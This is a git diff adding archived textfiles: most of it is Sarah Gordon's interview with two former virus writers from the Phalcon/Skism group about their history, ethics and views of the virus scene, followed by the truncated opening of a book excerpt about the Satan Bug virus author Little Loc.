+school's network, which upon entering the right password would let you 
+play games and look at nasty GIFs.
+
+Anyway, we started getting in to games and stuff.  One of the guys got a 
+copy of a game off his friend at home.  It seems that this game was 
+infected with the Jerusalem-B virus.  Now I didn't figure this out till 
+one day about a month later(during spring break) I noticed my Turbo 
+Debugger would not run.
+
+I called Borland (cause I bought the thing, I was not and never will be 
+a warez dOOd) and explained the error.  They had no idea, so I asked if 
+it could be a virus, and they said it was a possibility.  Wow!  A virus 
+of my very own.  So I hung up with Borland and got right on my local PD 
+BBS and downloaded the latest McAfee virus-Scam.  Sure enough, all over 
+my hard drive was Jeru-B!
+
+Most people would be P.O'd right about now but I was very happy.  To cut 
+this part short this is around the time I started learning how viruses 
+worked.  When I got back to school I told all my buddies that I created 
+a virus.  They were liked "Wow!" So we played around with the hacks that 
+I made.  None of the others knew jack about programming so I could tell 
+them anything I wanted.  The next thing you know we decided to start a 
+group, well I decided that we start a group.  I don't really think any 
+of these people cared much - we weren't at the time real computer hacks 
+but non-the-less we started a (unnamed) group.
+
+That summer I really started calling BBS systems a lot.  As it usually 
+goes I started picking up numbers for 'underground' BBSs.  I called a 
+few local ones and all they had to offer were cheap warez and junk along 
+those lines.
+
+There was one good UNIX board however, that was running Citadel.  Which 
+if you don't know is a primarily messaged based system.  They had one 
+area called 'hack' where there were messages on hacking.  So one day I 
+popped the big question, "How do yu write a virus?" What I didn't 
+realize at the time was 'hack' does not always mean 'hack' (as in 
+criminal).
+
+Needless to say I was scorned by the whole outfit on that system, but 
+they kept me on.  A couple of days later I got some mail on that BBS 
+that said - "Youlike viruses?  Call Landfill 914-HAK-VMBS". WOW!  Could 
+this be, a virus BBS?  So I called it right after getting the mail and 
+yes it was true, they did have viruses.  The problem was I had to upload 
+viruses to download viruses.  Damn.  That Whale viruses in VSUM looked 
+sick, and this guy had it.
+
+So what did I do?  I uploaded my little Jeru hack nd called it SKISM-1, 
+hoping these people would not catch on to what it was. The next day I 
+called the board and BAM!  I had 8 file points, the problem was after 
+downloading the 64k Whale file (all strains) I had no file points left.  
+So what did I do?  Hacked up another Jeru-B hack and uploaded it.
+
+I must mention that while reading some of the messages on the board I 
+kept seeing the name -=Phalcon=- at the end of some messages, at the 
+time I had not idea what it meant.  Then late one night I gave Landfill 
+a call.  To my surprise while scanning the new files the following text 
+comes up on my screen, "Garbageheap flings a bogger at you".  What?!?  
+Oh, the sysop has pulled me into chat.
+
+"Hey what's up?," he types.  So we got to talking and he mentioned that 
+he was in a group called Phalcon, and that (they) were hackers.  I was 
+able to make him think I knew about hacking by agreeing to everything he 
+said about hacking (I am good at 'social engineering').  He asked me if 
+I was in a group and I told him I was in a group called Skism.  Skism 
+was what my lame college group would have been called if anyone gave a 
+damn, so I wasn't really lying was I?
+
+Over the next week we chatted on-line more and more.  He seemed to like 
+me because I was the only one uploading 'zero day viruses'. Then one 
+night we went voice, and that's where it all started.  We came to the 
+conclusion that our groups should be joined, Phalcon was hackers and 
+Skism (me) as the virus end.  So I agreed and the reset is history (I 
+know, cliche).
+
+Over time we started getting good at hacking and coding.  Dark Angel came 
+back from his summer job (I wish I could tell you what it was, it would blow 
+your mind) and he started learning ASM.  When I went to re-apply for school 
+they told me I couldn't get a loan for semester.  So I decided to move out to 
+California for a while and just hang out.  Out there I was free from my 
+parents so I could hack a lot easier.
+
+I didn't have a computer my first few months so I started to learn the phone 
+system, big mistake.  To get off the subject, we started hooking up with a 
+lot of new people.  And we recruited some new long distance members.  One of 
+which was an ex-Rabid member, Time Lord.
+
+When I got a computer out there I started coding viruses again.  Dark Angel 
+had gotten really good, really fast.  Me and him were in friendly competition 
+for a while.  40Hex (which I forgot to include the origin of, if you want I 
+will type up a paragraph on that subject) had taken off.  All the hack/phreak 
+boards wanted to become Phalcon/Skism sites.  We officially became a group at 
+this point.
+
+Q: Please describe the main philosophy of your group as you see it.
+
+Lucifer: Don't ignore technology.  We have it, and we must explore it.
+
+Hellraiser: The philosophy of the group then was to be the best at what we 
+did and to gain recognition.  At least that's the way I saw it.
+
+Q: Do members of your group seem to share the same general philosophy?
+
+Lucifer: Yes.  We are all rather computer obsessive.
+
+Hellraiser: I will say it again.  I am still a member of the group in an 
+honorary way, I am not active at this time, nor have I been for the past 11 
+months, nor will I ever be again.
+
+Q: Does your group meet in person, or only on the modems/BBS?
+
+Lucifer: We meet in person, or we hack to speak for free.  Last year the big 
+game was to hack 1800 VMB's.
+
+Hellraiser: At the beginning yes, we did.  After the great crises (more on 
+that later) I think we all grew up mentally enough to say, "We are our own 
+people." However, that was when the group started to lose cohesion.
+
+The core of the group lived in the same 10 mile radius.  I lived around 30-40 
+miles away from them.  They met almost every day, because they were friends 
+before being a group.  I met with them once every one or two months.  We 
+talked almost every day on Landfill, or other local BBSs.  When the long 
+distance members came into play we talked on BBSs and conference calls three 
+to four times a week.
+
+Q: What is the average age of your group members?
+
+Lucifer: 25 and up, except one, who is 21.
+
+Hellraiser: Now, around 20.  Back when the group first started it was like 
+17.  I was one of the older members (over 21).
+
+Q: What activities do you find most to your lking that your group does: 
+hacking, phreaking, partying :), etc.
+
+Lucifer: Viruses and hacking.
+
+Hellraiser: When I was in the group the thing I liked the most was coding 
+viruses, because it was something not just anyone could do.  It gave me a 
+purpose in the group and made me one of the stronger assets.  I was the only 
+virus programmer at the origin of the group.  Dark Angel was the second.
+
+Q: What activities do you find most wrong that your group does?
+
+Lucifer: We let ourselves bow to the law.  The law is restrictive and 
+oppressive.
+
+Hellraiser: I never liked hacking for profit, this was the groups' downfall.  
+Well as I see it the group died after the bust, they are still active, I 
+know.  I think hacking for learning or exploration is fine.  It is against 
+the law in most cases.
+
+I don't see anything wrong with 'harmless hacking' as long as no information 
+is damaged or tampered with.  I know your thinking, "How would you like it if 
+someone rifled though your information?" And you are right on that account.  
+Yet I would rather have someone hack into my computer to prove he could do 
+it, than a person who hacks in the spy.
+
+Q: Does your group have any specific goals?  If so, what?
+
+Lucifer: No.  We just have fun.  We don't even do much as a group any more.
+
+Hellraiser: Back then (when I say then, I mean the days when the group was in 
+its glory) the goal was to be the best at what they did.  I think now the 
+goal is making money.  Not all of us, but if I wanted to I could name two 
+people who are in it for the money.  Unfortunately these are the people who 
+will be holding any legal binding to the group's name, so it will look like 
+we all soldout when they start making money off the name.  Others in the 
+group are in it strictly for the sport.  Dark Angel for one would never do 
+anything virus related for profit.
+
+==============================================================================
+
+"What are the beliefs of the authors?  Is it moral to write viruses?  
+What do hackers do?  In this third installment of Sarah Gordon's 
+in-depth interview with two legendary virus authors, she discusses with 
+them the ethics of writing viruses,  and they reflect on their 
+philosophy of telephone phreaking and data destruction."
+
+"One of the perennial questions asked of virus writers is why do they do 
+it?  The interview recorded explores what motivates such people.
+
+A serious difficulty when it comes to understanding viruses, virus 
+authors and the virus community is the inherent secrecy and paranoia of 
+its population.  Sara Gordon speaks with two self-confessed virus 
+authors, Lucifer Messiah and Hellraiser."
+
+==============================================================================
+
+Q: Regarding ethics - did you have, at any point in time during your 
+education, specific ethics based classes?  If so, when?
+
+Lucifer: Yes - a high school course called Man in Society.  They don't 
+call it that anymore.  Sexist name!
+
+Hellraiser: I went to Catholic school for 10 years if you can consider 
+that ethics.  The problems is after I saw what hypocrites the Catholics 
+were it kind of turned off 'ethical' behavior for a while.  I have lived 
+the past 12 years or so in hell.  Back then I could (not) care less 
+about the other people because I hated myself.  It is hard to be ethical 
+to other people when you ahve no self respect.
+
+Q: Please give me your definition of 'ethical' behaviour.
+
+Lucifer: Don't hurt what isn't yours.  It is important to leave things 
+as you saw them when you came in.
+
+Hellraiser: Ethical behavior to me is caring about other people.  If you 
+care about others, your behavior tends to lean towards ethical.
+
+Q: Do you think if something is legal to do, it is also OK to do?  For 
+instance, it is illegal to kill a bird in the woods.  Is it moral?
+
+Lucifer: Why would the bird be killed.  Was its wing broekn? Head half 
+crushed?  There are circumstances where anybody would kill the bird.
+
+Hellraiser: To a point yes.  As long as people are not getting hurt or 
+ripped off.  Some of the laws out there are BS, plain and simple.  If 
+you feel in your mind that what you are doing is right, I encourage you 
+to do it.  It is the idea this country was built on.  Sadly now-a-days 
+laws are being passed to take away peoples rights.
+
+Q: Do you ever talk about ethics or if something is right or wrong with 
+your friends?  If so, why? If not, why not?
+
+Lucifer: We talk in depth about anarchy and various anarchist 
+organizations.
+
+Hellraiser: The only person I have had an ethical converstaion with 
+(computer wise) has to be Garbageheap.  We both share (somewhat) the 
+same viewpoint on ethics.  The context of the conversation related to 
+hacking.  We figured if no one was getting ripped off or hurt, it was OK.
+
+Q: Have you ever been arrested :) for computer-related crime?  If so, 
+what?
+
+Lucifer: No.
+
+Hellraiser: Yes, I was arrested for theft of services.  Put simply I was 
+using a PBX system I should not have been using.
+
+Q: Do you feel you were treated fairly by law enforcement officials?  Do 
+you feel what you did was illegal and did you expect to be caught?
+
+Lucifer: I had a phone book confiscated from me.  It had confidential 
+numbers in it.  I flaunted it to the wrong person.
+
+Hellraiser:  I feel I was treated fairly by the D.A. Some of the 
+arresting officers tried to play the "bad cop" to scare me.  I knew it 
+was all an act so it didn't bother me.  I doubt most of the cops even 
+knew what my crime consisted of.  An ignorant cop is the worst kind of 
+cop.  My primary concern is how I will be treated by the law in the 
+future.  It seems that if you have a criminal record in this country you 
+can never again be trusted.  I would like to see how I will be treated 
+next time I get pulled over for speeding, or get caught in the wrong 
+neighborhood.
+
+Q: If you expected to be caught, why did you do the act?
+
+Hellraiser: I really did not expect to be caught.  The PBX was about the 
+most illegal act I performed.  I tried to keep a M.O. of not doing 
+anything to cost anybody money.  The PBX was a mistake.  I only used it 
+a little ($101.92) - I didn't think that was enough to get me caught.  I 
+was, of course, wrong.
+
+Q: If you did not expect to be caught, why did you think you did not 
+expect to be caught?
+
+Hellraiser:  It seems that most hackers/phreakers never think they will 
+get caught.  No matter how many people they see around them go down, 
+they think - It could never happen to me.
+
+Q: There is a trend lately to offer viruses via the Internet.  How many 
+places do you know of that do this?  Do you think it is responsible?  If 
+so, why?  If not, why not?
+
+Lucifer: There used to be two.  Skism's thing went down.  PC Scavenger 
+is still here, and will probably stay, because they aren't a virus 
+exchange.  They do have a real and legitimate service.
+
+Hellraiser: I only know of a couple of places, due to the fact that I am 
+only now getting into the Internet.  It is in there (their) legal rights 
+to do so, but I do not think it is responsible.  The reason I think this 
+way is I feel viruses should not be given to just anyone.  People get 
+hurt as a result of misuses of computer viruses. [Misuses, is there any 
+good use for computer viruses?]
+
+Q: What is your impression of anonymous mailers?  Do you think they 
+contribute to illegal activities of harassment?  Have you ever used one, 
+and would you consider using one?
+
+Lucifer: I would never use one.  First, I don't use my real name on the 
+Internet.  This is because I wanted to be able to talk about computer 
+viruses openly and have people know who I am in the underground.  It 
+isn't an entirely fake name, though.  It is a pen name I use in a lot of 
+places.
+
+Hellraiser: Of course it contributes to illegal activities.  On the 
+other hand - is can be a useful asset.  With great power comes great 
+responsibility - you can bet any loophole will be exploited for evil.  I 
+have been using them a lot over the past week, not for anything bad, 
+just your standard use.  I think they make life a whole lot easier.
+
+Q: What is your impression of virus exchange bulletin boards (Vx BBSs)? 
+Are you familiar with the study by me which documents that the viruses 
+themsleves do not yet have significant direct impact on users?
+
+Lucifer: Most virus exchanges have inferior produce.  Lots of garbage, 
+and a lot of lies.  They say they do it for one or other reason, but 
+when it comes down to it, it is to just have a bigger collection.
+
+Hellraiser: I have two views on Vx BBSs.  On the legal side, exhcnaging 
+viruses is currently legal.  I am not the one to go against someone's 
+rights.  On the moral side, I don't think viruses should be handed out 
+to just anyone.
+
+One thing I have to say about Vx BBSs is they (kind of) keep the 
+majority of the viruses out of the wild, despite what people may think.  
+The reason I say this is the majority of the viruses being made today 
+are uploaded directly to BBSs, not put out "in the wild".  If it weren't 
+for virus exchange boards, the only way to spread viruses would be 
+though the wild, leaving more people to get infected.  The one major 
+flaw with this theory i that the viruses will be downloaded.  Now the 
+average virus collector adds the virus to his collection and leaves it 
+at that, but there will always be that one person who uses a virus for 
+no good.  As for your study, I am unfamiliar with it.
+
+Q: Have you heard other things about this study, such as it was used to 
+try to close Vx BBSs?  If so, did you believe this?  If you did, why?  
+If not, why not?
+
+Lucifer: Oh, I've heard a lot about you :) Not that much with 
+substance.  Just stupid name calling and you being a narc.  I don't 
+care.  I don't listen to BS when it doesn't have proof.  It is easy to 
+dislike people you don't know.
+
+Hellraiser:  N/A
+
+Q: What do you see is the main problem virus writers such as NuKE have 
+with anti-virus programmers, educators, etc.?
+
+Lucifer: Their big mouths, thier complete disrespect for others.  That's 
+the problem I see.  Bontchev seems very indifferent, but they still say 
+bad stuff abut even him.  He is not anti-virus.  Anti-BS maybe!
+
+Hellraiser: I see the whole concept behind Nuke as a giant gimmick.  
+They want everyone to think they are the bad-ass virus writers, so they 
+must be the AVs sworn enemy.  The thing that they do not realize is that 
+by publicly fighting these AV people they are making them (the AV 
+people) look better.  They have to realize that the AV people are the 
+ones making the money here.  What is Nuke getting out of it?  Fame?  No 
+I doubt that.  If viruses writers wanted to really piss off AV people 
+they would stop writing viruses.  Nuke just plays the role, that's all.
+
+Q: What is your opinion of groups such as NuKE?  Do you think they are 
+ingaged in destructive behaviour, or do you feel they are posers?
+
+Lucifer: Read their source codes.  Of course they are in it for 
+malicious reasons.  Besides, the more malicious they are, the more 
+notorious they become.  Would you please shine a little more light over 
+here?? - just kidding.
+
+Hellraiser: N/A
+
+Q: Have you always felt the same way?  If not, what changed your mind?
+
+Lucifer:  Yes.  Ever since I heard of a virus group called KNULL.  
+That's Swedish for fuck.  They had it stand for something (K for 
+crack... etc.).  They dried up after 2 virus outbreaks.
+
+Hellraiser:  I have always felt the same way.  Rabid on the other hand, 
+were involved in destructive acts - I know this for a fact.  Nuke are 
+harmless.
+
+Q: How do you feel about the deliberate destruction of data?
+
+Lucifer: Stupid and foolish actions.  Irresponsible.  That isn't what 
+hacking is all about.
+
+Hellraiser: Two years ago I would have laughed if you told me one of my 
+creations wiped out a somebodies information.  Today I am in a different 
+frame of mind.  Losing data is _not_ funny whether it's a companies 
+payroll or Grandpa Smiths Windows directory.  Nobody likes to lose data.
+
+Q: What is your philosophy on telephone phreaking?
+
+Lucifer: I recently changed my mind on that one.  My friend got an 
+$1,800 phone bill that he didn't make.  I don't like that kind of 
+phreaking.  For blue boxing, I'm all for it.
+
+Hellraiser: I feel the glory days of phreaking were the only days of 
+true phreak-dom.  Using a toll fraud device back in the 60's or 70's was 
+harmless.  You were ripping Ma Bell off for a $3.00 call that in reality 
+cost about three cents.  Now-a-days it is a totally different story.  
+Today phreaking is more of a white collar crime, than a harmless hippie 
+prank.  Businesses and everyday people are losing _big_ money on PBX and 
+Calling Card fraud.  A lot of "phreaks" of today do not realize that.  
+Phreaks are dead, long live the phreaks!
+
+Q: Do you think most virus writers that you are acquainted with are 
+intentionally destructive?
+
+Lucifer: Yes.
+
+Hellraiser: The ones that I know, do not do it to destroy.  The only 
+targets of destruction my contacts have targeted are warez boards, and 
+this was a long time ago.  The majority (large majority) of virus coders 
+I know do it to show off what they know.  I don't think to many of them 
+realize that people will get hurt somewhere up the line if that new 
+virus they wrote gets out.  You always hear the excuse, "Well my virus 
+does not wipe data", which is just that, an excuse.  All viruses are 
+destructive.  All viruses corrupt files that people do not want tampered 
+with.  Even that cute little message, "V-MAN Has infected you system!", 
+is in my eye, destructive.
+
+Q: Do you feel that viruses should be made available to anyone that 
+wants them, with no respect to their motive, intent, or capability to 
+handle them?
+
+Lucifer: No.
+
+Hellraiser: No I do not.  But the reality is that they always will be 
+available to anyone who wants them.  It's kind of like drugs.  Do you 
+think passing a law to ban the availability of viruses will stop Vx 
+boards?  Pirated software is quite illegal, yet it seems every area code 
+has six or seven warez boards.  Even if a law was passed against virus 
+exchange, the trade would not die.  I doubt the feds would do anything 
+about it after initial 'example' cases.  One thing I learned is the feds 
+could (not) careless about anything except monetary loss.  How many 
+warez boards get busted every year?  Two?  Plus the only warez boards 
+that get busted are the ones that charge for membersship (Rusty and 
+Eddies, etc.).
+
+In an ideal world, I would never want to see an irresponsible person 
+handle a virus.  But this is not an ideal world.
+
+==============================================================================
+
+"In this last instalment of Sara Gordon's in-depth interview with the 
+two legendary virus authors, she discusses with them the perception of 
+the media with regard to virus writers and hackers - they disclose which 
+virus writer has most influenced them and how"
+
+"A serious difficulty when it comes to understanding viruses, virus 
+authors and the virus community is their inherent secrecy and paranoia.  
+However, the anti-virus community does communicate although invariably 
+via e:mail on the Internet.  Sara Gordon has conducted a series of 
+on-line interviews with two self-confessed virua tuhors, Lucifer Messiah 
+and Hellraiser.
+
+A knee-jerk reaction to virus authors is that they should be "flogged", 
+or suffer some other seriously unpleasant punishment.  Simply talking to 
+them is regarded by some elements of the anti-virus community as 
+subversive.  In this final part of Sara Gordon's interview, we learn 
+more about virus writers and their community."
+
+==============================================================================
+
+Q: What do you think of magazines like 40Hex and Crypt and Nuke 
+Info-Journal?  Can you compare the content of them and state how you 
+view them with regard to the information presented?
+
+Lucifer: Sometimes the articles are very good.  Other times they are 
+trash.  More often trash.
+
+Hellraiser: Being that I am the creator of 40Hex, I will just say that 
+it is an informative magazine.  The only thing that separates it from a 
+legitimate publication is the fact that it has virus source in it.  I 
+have not read enough Crypt journals to make a honest assessment, however 
+from what I did read it seems to be a close second if not tied with 
+40Hex as the pro-virus magazine top spot.
+
+As for Nuke Info-Journal, I think I have made it clear by now my opinion 
+of Nuke.  The magazine has not been stable enough in its views or format 
+to make any other judgment than, it sucks.  (Beavis & Butthead would 
+agree, I'm sure).  Seriously the Nuke Info-Journal as of late has been 
+filled with so many garbage and 'filler' articles it is unfair to 
+consider it a virus magazine.
+
+Q: Why do you use an alias?  Where did you find your alias, i.e. how was 
+it chosen?
+
+Lucifer: I already explained that one at the beginning [of this 
+interview].
+
+Hellraiser: An alias helps you hide who you are, obviously.  Other than 
+that it helps you forget who you are.  "I am not John Smith, Comp. Sci. 
+major - I am "The_WarMaster" smasher of lamers!"
+
+I got my handle from the movie Hellraiser and the novella The Hellbound 
+Heart by Clive Barker.  You may think it is just another horror movie, 
+but it really does have its own myths and a large cult following.  The 
+'heroes' of the story are beings who take pleasure in other peoples 
+suffering.  Kind of like virus authors, huh?  Is there a connection?  I 
+will leave that up to you to decide.
+
+Q: How long have you written viruses?  Which ones have you written?
+
+Lucifer: For about three and a half years now.  I've written too many to 
+list.  Some were just deliberate hacks to show other people how easy 
+that was.  Others were fully my own, or the groups own.  Others grought 
+in new technologies.  We have a few of those.
+
+Hellraiser: I have been writing viruses since mid-1991.  For the record 
+the only viruses that were released by me were; Skism-1, Captain Trips, 
+Bad Brains, Marauder, and Shiny Happy - in that order.
+
+Q: Have you ever released a virus, intentionally or unintentionally?  
+What was the result?
+
+Lucifer: Yes.  The 'SBC/KS Test' virus really got around before it was 
+got under control.  I didn't relrease that intentionally.  I gave it 
+away to an idiot, who's initials are SBC, by the way.
+
+Hellraiser: I will not answer this question due to obvious reasons.
+
+Q: Have you ever conducted business with any anti-virus product 
+developer? If so, what were the circumstances?  How were you treated by 
+him or her?
+
+Lucifer: Yes.  Only virus trades, though.  Most of them are European.  
+Americans are too afraid.
+
+Hellraiser: This may not be business as you were thinking, but...
+
+I was on a conference call with John McAfee.  We called him because at 
+the time he had the number one anti-virus product out.  John Markoff 
+from Computerworld was also on the conference.  Computerworld did an 
+article about the conference.
+
+John was very nice towards us, yet we could see that he has two faces.  
+He would talk openly to us when Markoff was not o, but he played the 
+hard role when the tape was rolling.  John introduced us to John Dvorak 
+over the phone.  Dvorak seemed like a pretty mellow guy.  Yet he seemed 
+more interested in graffiti than viruses.
+
+We also had a conference call with Ross Greenburg, creator of Flu-Shot.  
+Honestly I am not sure if he knew we were virus authors.  We just told 
+him we would like to interview him for 40Hex magazine.  Before I talked 
+to him, I had the impression he was a fool, due to his comments in the 
+documentation for Flu-Shot.  To my surprise Ross was an OK guy.  I got 
+the impression he was a little sick of his career as a AV person.
+
+Q: Please define for me what you think 'research' is.  Who is qualified 
+to present themselves as a 'researcher'?
+
+Lucifer:  Not many are researchers.  PC Scavenger is real research.  So 
+is Bontchev and Dr. Solly.  I don't believe McAfee is, otherwise he'd 
+have a better program.  SKISM are a research group.  They research 
+viruses to advance them.  The Hell Pit is NOT a research BBS...they only 
+trade.
+
+Hellraiser: Research, for a Vx BBS, is the same thing as calling a warez 
+board a software rental outfit.  It's just a safety precaution to stay 
+out of trouble with the law.  A virus researcher in the true sense is 
+someone committed to stopping the spread of computer viruses, or at 
+least someone making money off an AV product.  I guess the only people 
+qualified would be people with real (not vaporware, ahem Nuke) AV 
+products in the works.
+
+Q: What is your opinion of the following people: John McAfee, Patti 
+Hoffman, Fridrik Skulasson, Frans Veldman, Vesselin Bontchev, Eugene 
+Kaspersky, Cliff Stoll, Rock Steady, Chris Peelter, Erik Bloodaxe, Time 
+Lord, Dark Angel, Aristotle, John Buchanan, Mark Ludwig, Morton Swimmer, 
+Hans Heubner, Eric Corley, Urnst Kouch, Peter Tippet? (Note: This 
+question was asked to discern if the subjects would have any recognition 
+of positive role models.)
+
+Lucifer: I just heard of Eugene Kaspersky today.  No comment, I don't 
+know him.  I like Bontchev.  I don't like McAfee because he lies too 
+much.  Rock Steady is a pre-pubescent shithead (you'll have to 
+paraphrase that!), Dark Angel is the programmer from hell, his DASBOOT 
+really boots!  Aristotle is lame, Mark Ludwig wrote a book on viruses 
+when he didn't know much about them.  He's gotten much smarter these days.
+
+Urnst Kouch is cool, but he has a heavily inflated ego, Time Lord seems 
+okay, but he is vapourware pro.  Patti Hoffman, I like her.  She found a 
+really unique way to make money in this virus era.  Frans Veldman is 
+hard to talk to.  Fridrik Skulasson is cool, especially since he is also 
+Scandinavian.  I never say bad things about Scandinavians.  Erik 
+Bloodaxe has a bad name in Toronto, who is he?  Never saw him before.  
+Solly is cool.  I see him on the Internet often.
+
+Hellraiser:  John McAfee - A man pushing obsolete technology.  If john 
+wasn't such a shrewd businessman, he would be out of business.  His 
+product was once useful, but with the amount of viruses out there today 
+it is quite useless - as are all string scanners.
+
+Patii Hoffman - Sort of the Bill Clinton of the virus world.  Her heart 
+is in the right place, but she has no idea what she is doing.
+
+Fridrik Skulasson - A man who has chosen virus research as his career, 
+and he feels has has to make the best of it.  He has a good sense of 
+humor, and he really knows how to piss off a virus coder.  His product 
+is very well done, although I prefer TBAV.  I have a feeling that when 
+the general public becomes enlightened to the power of heuristics, he 
+will have a number one product.
+
+Frans Veldman - I do not know enough about him to make a judgement.  I 
+will not include people in this category from now on.
+
+Vesselin Bontchev - By reading this mans work I sense he is hiding 
+something.  Most likely his connection to the Dark Avenger.  I believe 
+this man is working with the Dark Avenger, if he is not the Dark Avenger 
+himself.  I have never used his products.  I guess he is the John McAfee 
+of Bulgaria.
+
+Cliff Stoll - A very energetic, if not psychotic man.  I read his book 
+and found it somewhat interesting.  He is what I consider a 'good' 
+hacker.  If he wasn't so good, he would be hacking himself.  I would 
+like to sit down and have a talk with him someday.  He's a real character.
+
+Rock Steady - A fool, plain and simple.  See the earlier portions of 
+this interview for some clues as to why I feel this way.
+
+Erik Bloodaxe - An old hack, who is living off his past.  It's time to 
+move on Erik!  I don't know him personally, it's just the impression I 
+get from people like him.
+
+Time Lord - A great guy and a good friend.  He is one of the few good 
+things that came out of my hacking ordeal.  TL must get over his 
+rebellious hacker mode if he wats to move on.  He has been lucky so far 
+- I learned luck does run out.
+
+Dark Angel - Again a great guy and a good friend.  He is a very bright 
+kid and I think as soon as he gets over writing viruses, he will make it 
+big in whatever field he chooses.
+
+Aristotle/John B. - A strange, possible schizophrenic/highly 
+manipulative man.  I do not trust this guy.  John has problems, 
+obviously.  First and foremost is that he never grew up.  He is still 
+living in the 'I am a menace to society, so watch your back' mode.  I 
+can't understand how a grown man, with a wife and kids can act like 
+him.  If john had half a brain I would consider him a potential threat.  
+It is a good thing this is not the case.
+
+Eric Corley - I met him a few times.  He is a true hacker, and will 
+never stop hacking even if it does not involve physical hacking.  He 
+shares the same mind state I see in Phiber Optik, Ixom, and others.  I 
+can't relate with people like that.
+
+Q: What is your primary perception of the media as relates to hackers 
+and virus writers?  Why?
+
+Lucifer: Oh god, I could write a book.  I am very unhappy about most of 
+it.  I do like the attention I get when people hear that I'm a hacker.  
+They think I am a god or something.
+
+Hellraiser:  The media uses hackers and viruses writers to sell papers, 
+that's business.  Hackers and viruses writers are always padded out as 
+being some sort of deranged super-genius.  They make the public think 
+that hacking into systems takes an incredible skill.  In reality and 
+lamer with a UNIX book and a list of defaults can hack into 50 per cent 
+of the systems he or she comes across.  The media press on virus writers 
+is always the same, a angry young man sits behind a terminal blasting 
+death metal.
+
+Q: Are you aware of the new trend by some virus writers and some a-v 
+people to recreate the myth of Dark Avenger?  Do you know who the Dark 
+Avenger is, i.e., not his real name of course, but what his history is?
+
+Lucifer:  Yes.  I know a lot about him.  It is more of a myth than 
+anything, because he wasn't anything much, same as Rabid.  Lots of 
+distribution, but that's all.
+
+Hellraiser:  To be honest I know nothing about the Dark Avenger - which 
+is one reason I find him so intriguing.  I know nothing of this trend, 
+nor his history.  If you told me he was Vesselin Bontchev I would not be 
+suprised.
+
+Q:  What is your impression of the Dark Avenger's impact on virus 
+writing in the past five years/
+
+Lucifer:  False.  Plastic.  Just another thing to cry about.  The MtE 
+was perfect to jolt everybody upright, though.
+
+Hellraiser: I have not heard much about him over the last year or so.  
+He was all the rave when Bulgaria was the hot-spot for computer 
+viruses.  His smarts for viruses combined with his mysterious identity 
+makes him the number one virus aithor in history.  If you asked me two 
+years ago what virus programmer I respected the most, I would say the 
+Dark Avenger.
+
+Q: What virus writer has most influenced you at different stages of your 
+virus writing life (can be more than one, more than one time in your 
+life), and how has he or she influenced you?
+
+Lucifer: None.
+
+Hellriaser: Unknown origins.  The only one that actually had any impact 
+on me was Dark Angel.  Dark Angel started out learning from me.  We were 
+in a friendly competition there for a while.  In no time his skill 
+surpassed me [and] he was teaching me.  He is a great teacher, and 
+willing to teach.  He is the only person I allowed to influence me.
+
+Q: Do you think you will ever stop writing them?
+
+Lucifer: Yes
+
+Hellraiser: Yes, in fact I haven't coded a virus in over a year.  I will 
+never code a virus again.
+
+Q: Why would you stop writing viruses?  What has happened to you, or to 
+the virus writing scene in general, that makes you personally want to 
+stop?
+
+Lucifer: I've slowed down considerably.  The scene is boring, and I can 
+think up only so many ideas that are my own.
+
+Hellraiser: Virus writing is a waste of creative energy.  It limits the 
+coder to one set area.  On top of this I now realize it is wrong, and 
+can cause people unwanted strife.  The person I once was is quite dead, 
+the only way I can move on is if he stays that way.
+
+==============================================================================
+
+Conclusion:  These young men are representative of the vast majority of 
+virus writers and are, finally, ex-virus writers - they may be involved 
+in shaping the future of computer.  The turning away from virus writing 
+is a virus positive trend, and one that will hopefully continue.
+
+In my opinion communication is one of the most important methods of 
+dealing with the virus and security threats that we are facing today's 
+global computer environments.  A willingness to discuss issues and ideas 
+is the first step we all have to take if we wish to shape Cyberspace, 
+and enable it to become all that it has the potential to become.
+
+
diff --git a/textfiles.com/virus/locprst.txt b/textfiles.com/virus/locprst.txt
new file mode 100644
index 00000000..aed857fa
--- /dev/null
+++ b/textfiles.com/virus/locprst.txt
@@ -0,0 +1,670 @@
+[An excerpt from THE VIRUS CREATION LABS: A JOURNEY
+INTO THE UNDERGROUND]
+
+A PRIEST DEPLOYS HIS SATANIC MINIONS
+
+Everyone knows the best virus writers hang out on
+secret bulletin board systems, the bedroom bohemias
+of the computer underground, right?  Wrong.  In
+mid-1992, a 16-year-old hacker from San Diego who called
+himself Little Loc signed on to the Prodigy on-line service
+for his virus information needs.  The experience was
+not quite what he expected.
+
+Prodigy had a reputation in 1992 as the on-line service
+for middle-class Americans who could stand mind-roasting
+amounts of retail advertising on their computer screens as
+long as they had relatively free access to an almost
+infinite number of public electronic mail forums devoted
+to callers' hobbies.  Since Prodigy's pricing scheme was
+ridiculously cheap per hour, it was quite seductive for
+callers to spend an hour or two a night sifting through
+endless strings of messages just to engage in a little
+cyberspace chit-chat.
+
+Into this living-room atmosphere stepped Little Loc, logged
+on as James Gentile, looking for anyone to talk with about
+computer viruses, particularly
+his idea of properly written computer viruses.  Little
+Loc, you see, had written a mutating virus which infected
+most of the programs on a system dangerously quickly.
+If you were using anti-virus software that didn't properly
+recognize the virus - and at the time it was written none
+did - the very process of looking for it on
+a machine would spread it to every possible program on
+a computer's hard disk. While many viruses were trivial
+toys, Satan Bug, which is what Little Loc called his
+program, was sophisticated enough to pose a real hazard.
+The trouble was, Little Loc was dying to tell people
+about Satan Bug. But he had no one to talk to who would
+understand.  That's where Prodigy came in.
+Prodigy, thought Little Loc, must have some hacker
+discussions, even if they were feeble, centered on viruses.
+It was a quaintly naive assumption.
+
+The Satan Bug was named after a Seventies telemovie starring
+George Maharis, Anne Francis and a sinister Richard
+Basehart in a race to find a planet-sterilizing super
+virus stolen from a U.S. bio-warfare lab.
+Little Loc had never actually seen the movie, but he'd
+run across the name in a copy of TV Guide
+and it sounded cool, so he used it for his digital
+creation. Satan Bug was the second virus he had electronically
+published.  The first was named Fruitfly but it was a
+slow, tame infector so the hacker didn't push it.
+
+A bigger inspiration for Satan Bug was the work of the
+Dark Avenger, the shadowy Bulgarian virus programmer whom
+anti-virus software p.r. men and others had elevated to
+the stature of world's greatest virus writer.  Little Loc was fascinated
+by the viruses attributed to Dark Avenger.  The Dark Avenger
+obviously knew how real computer viruses should be written,
+thought Little Loc. None of his programs were like the silly
+crap that composed most of the files stocked by the
+computer underground.  For example, his Eddie virus - also
+known as Dark Avenger - had gained a reputation as a program to
+be reckoned with.  It pushed fast infection to a fine art,
+using the very process anti-virus programs used to examine
+files as an opportunity to corrupt them with its presence.
+If someone suspected they had a virus, scanned for it and
+Eddie was in memory but not detected, the anti-virus
